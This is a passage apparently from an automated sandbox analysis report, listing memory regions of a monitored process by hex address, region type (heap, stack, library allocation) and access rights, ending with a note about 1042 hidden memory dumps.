page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
5D7C000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
6109000
|
heap
|
page read and write
|
||
604C000
|
stack
|
page read and write
|
||
7CA0000
|
trusted library allocation
|
page read and write
|
||
4CD4000
|
heap
|
page read and write
|
||
2FBE000
|
stack
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
6101000
|
trusted library allocation
|
page read and write
|
||
42CE000
|
stack
|
page read and write
|
||
6203000
|
heap
|
page read and write
|
||
6129000
|
trusted library allocation
|
page read and write
|
||
3069000
|
heap
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
687E000
|
stack
|
page read and write
|
||
27DF000
|
heap
|
page read and write
|
||
2CE0000
|
heap
|
page read and write
|
||
672E000
|
stack
|
page read and write
|
||
653F000
|
stack
|
page read and write
|
||
4F2E000
|
stack
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
5E5B000
|
trusted library allocation
|
page read and write
|
||
7266000
|
heap
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
616D000
|
heap
|
page read and write
|
||
58C000
|
stack
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
7DEE000
|
heap
|
page read and write
|
||
31A8000
|
heap
|
page read and write
|
||
321E000
|
heap
|
page read and write
|
||
5CAC000
|
heap
|
page read and write
|
||
281E000
|
heap
|
page read and write
|
||
7E31000
|
heap
|
page read and write
|
||
56A5000
|
heap
|
page read and write
|
||
23B7000
|
stack
|
page read and write
|
||
5D09000
|
heap
|
page read and write
|
||
5CA5000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
4C80000
|
direct allocation
|
page read and write
|
||
5713000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
6F30000
|
trusted library allocation
|
page read and write
|
||
56C6000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
61D8000
|
heap
|
page read and write
|
||
4970000
|
trusted library allocation
|
page read and write
|
||
4980000
|
trusted library allocation
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
7CB0000
|
trusted library allocation
|
page read and write
|
||
5540000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
7340000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
75BD000
|
stack
|
page read and write
|
||
56F6000
|
heap
|
page read and write
|
||
329D000
|
heap
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
32AE000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
4992000
|
trusted library allocation
|
page read and write
|
||
610B000
|
heap
|
page read and write
|
||
4CA8000
|
heap
|
page read and write
|
||
2C70000
|
trusted library allocation
|
page read and write
|
||
56F6000
|
heap
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
681C000
|
stack
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
6F60000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
61DF000
|
heap
|
page read and write
|
||
60E1000
|
heap
|
page read and write
|
||
61D8000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
616D000
|
heap
|
page read and write
|
||
7200000
|
heap
|
page read and write
|
||
6E30000
|
heap
|
page read and write
|
||
7292000
|
heap
|
page read and write
|
||
31C5000
|
heap
|
page read and write
|
||
6241000
|
heap
|
page read and write
|
||
2853000
|
heap
|
page read and write
|
||
27E8000
|
heap
|
page read and write
|
||
4960000
|
trusted library allocation
|
page read and write
|
||
84D5000
|
trusted library allocation
|
page read and write
|
||
2714000
|
heap
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
1CA000
|
stack
|
page read and write
|
||
4964000
|
trusted library allocation
|
page read and write
|
||
2940000
|
trusted library allocation
|
page read and write
|
||
616D000
|
heap
|
page read and write
|
||
42E0000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
4CF9000
|
heap
|
page read and write
|
||
7FD28000
|
trusted library allocation
|
page execute and read and write
|
||
6224000
|
heap
|
page read and write
|
||
2822000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
6B70000
|
heap
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
2812000
|
heap
|
page read and write
|
||
8470000
|
heap
|
page read and write
|
||
4963000
|
trusted library allocation
|
page execute and read and write
|
||
29BE000
|
stack
|
page read and write
|
||
313B000
|
stack
|
page read and write
|
||
32BF000
|
heap
|
page read and write
|
||
4D00000
|
heap
|
page read and write
|
||
2755000
|
heap
|
page read and write
|
||
28EF000
|
stack
|
page read and write
|
||
6C8F000
|
stack
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
63E000
|
stack
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
4CA0000
|
heap
|
page read and write
|
||
4D0E000
|
heap
|
page read and write
|
||
7230000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
2720000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
6168000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
28D4000
|
heap
|
page read and write
|
||
5BA1000
|
heap
|
page read and write
|
||
292D000
|
trusted library allocation
|
page execute and read and write
|
There are 1042 hidden memdumps, click here to show them.